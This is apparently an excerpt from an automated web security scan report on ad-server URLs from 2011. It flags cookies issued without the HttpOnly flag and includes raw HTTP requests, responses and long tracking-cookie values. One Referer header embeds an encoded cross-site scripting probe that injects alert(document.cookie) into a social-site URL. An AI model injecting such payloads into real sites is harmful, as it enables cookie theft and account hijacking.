Set-Cookie: bh="b!!!%-!!!?J!!!!)='htq!!(1-!!!!-=(6NF!!*lZ!!!!#=$Wj6!!,WM!!!!#=$Wj6!!..X!!!!'=$L=p!!/GK!!!!-=(6NF!!/GR!!!!-=(6NF!!/Ju!!!!$='htq!!/K$!!!!(=(6NF!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!(=(6NF!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=)n!A!!J<J!!!!.=(6NF!!J<K!!!!.=(6NF!!J<O!!!!,=(6NF!!J<S!!!!.=(6NF!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OfW!!!!$=)DMq!!PKh!!!!'=+$jA!!PL)!!!!'=+$jA!!PL`!!!!(=+$jA!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!.=(6NF!!j,.!!<NC=)n!A!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!$=(bh!!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=)n!A!#2%T!!!!%=)YC>!#2.i!!!!'=+$jA!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D`%!!!!,=(6NF!#Dri!!!!$=)YC=!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!,=(6NF!#MTF!!!!'=%=]S!#MTH!!!!.=(6NF!#MTI!!!!.=(6NF!#MTJ!!!!.=(6NF!#Nyi!!!!#=!eq^!#O@L!!<NC=):+(!#O@M!!<NC=):+(!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!$=(6NF!#UDQ!!!!.=(6NF!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!$=)YGq!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!$=(6NF!#]Uq!!!!$=(6NF!#]Uy!!!!$=(6NF!#]Z!!!!!*=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!#=(6NF!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!'=(6NF!#`-[!!!!'=(6NF!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7
bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!#=(6NF!#b86!!!!#=(6NF!#b87!!!!#=(6NF!#b8:!!!!#=(6NF!#b8F!!!!#=(6NF!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!#=(6NF!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!(=*3W+!#dWf!!!!#=#mS:!#eDE!!!!$=)YX/!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!#=(6NF!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!$=(6NF!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#sli!!!!$=+%/.!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!$=(6NF!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!,=(6V[!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!$=(6NF!$#X4!!!!#=#%VO!$#yu!!!!,=(6NF!$$I]!!!!#=(6NF!$$Ig!!!!#=(6NF!$$Il!!!!#=(6NF!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'%-!!!!%=)n$<!$'/S!!!!#=#mS:!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!(=(6NF!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-'0!!!!#='i$,!$-rx!!!!#=$GXw!$.#F!!!!%=)I#r!$._W!!!!#='i+,!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$2?y!!!!#=(6?g!$35v!!!!#=(BU="; 
path=/; expires=Fri, 05-Jul-2013 11:22:11 GMT
Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Wed, 06 Jul 2011 11:22:11 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

10.19. http://adonmax.com/afr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adonmax.com
Path:   /afr.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afr.php?campaignid=432300;what=728x90;cb=20553859530;ct0=gevalia.com HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://pubads.g.doubleclick.net/gampad/ads?correlator=1309961817112&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_ROS_ATF_728x90&page_slots=Bebo_ROS_ATF_728x90&cust_params=Age%3D&cookie=ID%3Db4c69d12d978f884%3AT%3D1309961817%3AS%3DALNI_MYE_lPMWMFFaRwcAhqAp3Tb_Kat8g&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2Fc%2Finvite8281a%27%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ea91f426563e%2Fjoin&ref=http%3A%2F%2Fburp%2Fshow%2F14&lmt=1309961818&dt=1309961818638&cc=100&oe=utf-8&biw=1164&bih=723&ifi=1&adk=4139378151&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&flash=0&gads=v2&ga_vid=1130727521.1309961819&ga_sid=1309961819&ga_hid=33112019
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: adonmax.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:19:29 GMT
Server: Apache/2.2.19 (CentOS)
X-Powered-By: PHP/5.2.17
Set-Cookie: id=604085l37; expires=Sat, 06-Aug-2011 14:19:29 GMT
Content-Length: 334
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=uft8">
<title></title>
</head>
<body>
       <a href="htt
...[SNIP]...

10.20. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: rsi_us_1000000, rsiPus_TE1N, rsiPus_RXmH, rsiPus_feb9, rsiPus_21Ju. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=K08784 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=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; rtc_Vpu9=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; rsiPus_TE1N="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"; rsi_us_1000000="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"; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TE1N=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RXmH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_feb9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_TE1N=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RXmH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_feb9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_21Ju="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Wed, 06 Jul 2011 14:01:05 GMT
Content-Length: 541

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

10.21. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: rsi_us_1000000, rsiPus_feb9, rsiPus_TE1N, rsiPus_RXmH, rsiPus_Jawe. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=K08784 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/about.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_feb9="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"; 
rsi_us_1000000="pUMV4j9DMIYVbY/ikx0KzFTj+FP87ZD9RDcPotrS7irqfu3qY4mFlBU4RjWfnjoBtdFs4WH3fJ6SXFZiS4a53zugCH5h+glQPB4sV4//RPT3TI3QN5T82ZUr/EpqQWf4RdnePtzNmGQEQI1D6tOTkfqk+GqQnQi8ZSCEdHfQHI8jIsrKKzwcxCWHgc0f5DJLLb7IRN11f/w+UvgpQsfP7GxBX1VXNiwtkuax2pbE2sMdZZ6ukKQGGhd6zImH+FwTxfJr3h/d58ejzinjY0Y8cCQnIIheka/NCb0ynwHx2Q9HlUftUEe+G8IP9BX9bwrU8+vYG3rcskqPsdoiTWJHWazmGKOyL+BtLxRTQKcggG6nDSHItI2lS4+kqYzKLIlyDDacwVi1Qz6Ynv1arcp3N4ANE70ZCYzt4MwYKV0nR45LNXVmpHW6j3pTpTB+Up1/bxv9LxVoD3G7J6V29zGBXC+ZYf7+Y+zAy/fmMg454372IY6WkhFI/0egVGf/kYE39SJUM5rTcW0Z7lmVNnaFsF27dHeDaQxXEx/cutg3scRto6ngyjpVnMSGKRvlJ+eu7Zn5V/aSgcXvuALUjSEuR7gssyupFlO0wLxymarhFpMK94VXjj5yaQlJ8MUFlCP/qq/Q1MjKTybRe6jEydbnMGIk5KQ+9EzCv/5AKql/SGwGhvGmK59b8mI0H/s59fcnAaYsTRAh/Gk1GeYHUgEDvSZsuQUTI78KkJXzq/pYbk6qPpLWSRfYlS6a4UnXidqrhhMwnIUtmQk83pnjGzweIe9ifQhl0DW31nUdNKCg3kSOV2LuBbISDzIYDN2z9p906jF1FvxrD2xtzxTas48XslO7BtR/Lkh74WCTKmQ2TcR/80YXAs2x54Unx8/hxsRu+6b2TFgabOY74v0H6PliIbZ+0ydXPZvr6GGWt1iBTOoJfcT7e0r0Qe6ZToij8/lnbZLfV+uEDXOLuOPT+JdyEMvMsEn7HcvBF+lm6kNgTKN2N0+RLO2pzEjlrbHdcho1MyFF9RtXqkWiSYP1SK0Z1JpQawf1VOEyblQFx7TAFSHkDq5YarNx1BjiCNSpT4pkc8zWlMERLAj742CxFJcNA7+7bqXIMpeRazq3GjYvq1ZExQxa14EVX3zMvdLiL4537bQzTtImWwRFCeJp1vOWaNCtiBaCCjUkE2AoeBTuAe4c4yZkwslcIwpVDwPnAc3kKPZLY+Z993KEKoXrWe62waOFdM9UyBhhZ8eyiviPRdWN+n5QWZXB/ytQk/EE16yEod9zUfnImrZJQW9Ys8nMLoze9ggGLSwXkoCVW0jHGRYkBUzEn3w0mptRnwXBbU/Ng4L9wDqPV1VjFlj2eXdfBEd2SWiWEoWV6VePTqpTUUoOMH9nsKTy2BqAdM8+Ek6W3257M/WcT6RgFIYhPu9y3eoJOGdX0ulvPgicSTBr+v6691MMM3Rz/UjOBFtYVx3shMKNlsstRh3vd0jUAyZ6258m9TC3vzg4Mry01nPVr29HB6VUElrRvOKGL8L3qbFAhutUcO/UxXT8a1f+Bhn0sp4SoJzDjEp2cmrA6sxh0SZm33XoaXmH3bmvhnpJX401vQl6DH1RWGWhl6f3idkGtOok/Mk4AKZw1ruTMAbId9Eat5e7LdG4+YIdz+UghA39ntHpNv3FgpMH0DEwDClJszcizVL1xoXNjpyDlYFVaZN8VWoDHe8ueyeVUuvLZwNIkyVi6GZHodr4jdrYvXA+PsERFXEqNg49BAC8jJ6+hf3tGtMtpIavStGyayEm8pmgXnw2/dXLA58vkqaROPe/EhQVfRLBrpPtrP5LkdoyM9GtJD4W6ykqZgFFE6WIfcG3GJ03m55lU7HlWlxuXMSDj9oTnVA9DT33GFTIAc+OmYkGrvWKeQflFuagdRs4X42I5wKzsz9acFXUpmJvMuZy5z5LO2t2s+5TmrnpVq0KmuWhwNOQaYsN+7Romyg47j4n
SP+0fpyhJKll1yPjWD9tHBkY+R0MUxDV9WvcFQ=="; NETSEGS_K08784=82f4957c1a652091&K08784&0&4e39547c&0&&4e140790&1f1a384c105a2f365a2b2d6af5f27c36; rtc_v0Na=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; rsi_segs_1000000=pUPF4jOheXIMH/C1v6FY5BD9CU6du67BSgvgzGDKayViGy3JIntSYSCogy2dpq+vTNY9h2lFiAhEBsltMJbTJ9ivq7PTxfNWHGNAsDuCMaDOsTL2zPjGJ+CmLyT1fIx2UEmQqSaRlxwJf87lS0DSpS34ET1l5eDtMmmNUq38ritDzt0qMIT37KJxcr4I926kXGcBv1f+PlRy1YRo+0j9e1w838xgs4qtMuHJ90XLG6RbwlkrvkToOceVQTaOiUZU/rxSy5Qu6HXjzsXVOVmNAWWASVamxCEkN1L6ihWFC8ws5XARoRY9wzIAMfg9/1loHEfe1+HXBkwmZBbpcxg51RGTU74BDldjx2+dF0Ma8d2aV97JgPzw21QEGFaJMpQxIa8qF7TyvyiIDfGdeKQGuAQ/OTDCJg4o2QVFNzKdUEvgGjAOEysGaiRP3qVv7QVIJoh+/u0LWksU4W2M2y8ypXUrK0K3ItRF/Iczv8l1mcBHEcZNvPgAHmNJ29T7pHeeR8oFKTQNfPyQmLW2aaz3YNVElfNa5z9QG4akMouVMFXDD0rhvkqtZ8sYH5/H7N49fKrdemzWSUrYrcbYHCQv+GTQOTlvJ3I7uggVSAxHoD70bb3St51P9Dxv6oXHekK5/IYIf28uwGtRcld8yrPBrHAg34wtHGRhvpl6dHoJZo/vbbsKtSnDL3Zz19C1wHWlV8uTdIjd90gL5yoZRDt6LeZpFQudSu0zSwA9IvWVADSBfsZ6S0NDSfgYUcFw8jp9Tl70PII=; rtc_SA26=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; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_feb9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TE1N=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RXmH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_feb9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_TE1N=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RXmH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Jawe="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMV4i2jMIYZ7ES1kb10eZfVkVm7iIJZBa5Z642kqPytE/lFy+9C7Its0hWRkE8F6vlyBe/9Trz9i3gmy4SmoNYf4RgLJ57l6XK2XM/zpxd+bWfKtBiH1p4PveCiA30MI78vG1slAzQEuI4Pj+v4BdLCmIoU5Yani/TSqHGz6VoMwG4CC7VGiDuesbxiXf2W2Iqk52/xeAS+0Rjlz2nwqJ6CfeZ4xISeLhfuygLAPAlgi3xGkXLZ5wezJstSrtcZvJqS5DcF4vEdvh0cSV7drZl3996CIo/lAKkqMjpJoN9EOahRHkbj76DE8ADMQwfo3txn/IZhZGxYdBlwhaEDOB+aFAWS+uNtb19XpabQhu5AgMMrXDR0tbd/Z4AveSJ+//M8i8Fp6O8tP7EwsqdbWF6A3E+uXrpIU5e5W8VMBQA2jr39wIlmH0e0a3kexbltOd9lpf9D/gz8AiZPbvNt3jaqCsnewupAsprKHp30HU9z7PEnSz2LIFkh2SycQUEy/0oeQ6kpjiC3Y7zkrhJNI5oheGtAtEZtSsH2km/NN0qMzYyTvrwurIlgwZfHcq642qtp0HAFYBszyc5HRY7z27QXKawd5eqdAiwI1sNzUV8GYgkzytrqTth+eZJtOkV6DgxzVxlrXY+5mc2THvCA+ily4O24IMuEnJTXoZmpSgHQD89+2/fVTpN4aqXKNnzDREGGnsEuj+gObqhzbc0jTN6wpjAsV82F6cZgGaajYS1fTcKMVVdcJNbESUizsTti8oky+L2t22c53o8F87DIYOlifQhl0DW31nUdNKCg3kSOV2LuBbISDzIYDN2z9p906jF1FvxrD2xtzxTas48XslO7BtR/Lkh74WCTKmQ2rc9H80YXAs2x54Unx8/hxsRu+6b2TFgabOY74v0H6PliIbZ+0ydXPZvr6GGWt1iBTOoJfcT7e0r0Qe5tUy6iijtrwNpWUysX3FcgWlT9CuHU3gJRHyJP